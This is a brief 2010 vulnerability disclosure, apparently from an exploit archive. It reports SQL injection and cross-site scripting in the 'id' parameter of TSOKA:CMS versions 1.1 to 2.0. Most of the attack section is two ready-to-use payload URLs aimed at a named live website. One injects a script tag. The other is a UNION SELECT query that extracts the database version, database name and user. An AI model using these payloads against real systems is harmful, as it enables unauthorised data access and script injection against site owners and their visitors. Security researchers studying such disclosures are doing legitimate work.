TSOKA:CMS versions 1.1, 1.9 and 2.0 suffer from cross site scripting and remote SQL injection vulnerabilities.
ca19794175424edd62bacea2edd85933a145b94c9339d44c184679e5c6c87bda
[~]-----------------------------------------------------------------------------------------------------------------------
[~] TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability
[~]
[~] http://www.alanzard.com (from italy)
[~]
[~]
[~]
----------------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 28.03.2010
[~]
[~]
[~] http://security-sh3ll.blogspot.com
[~]
[~]
----------------------------------------------------------------------------------------------------------------------
[~] articolo&id= SQL & XSS
[~]
[~]
[~] Ex -
[~]
[~] http://www.mpmtennis.com/?pag=articolo&id=
"><script>alert(/XSS/)</script>
[~] http://www.mpmtennis.com/?pag=articolo&id=-1 UNION SELECT
concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8--
[~]------------------------------------------------------------------------------------------------------------------------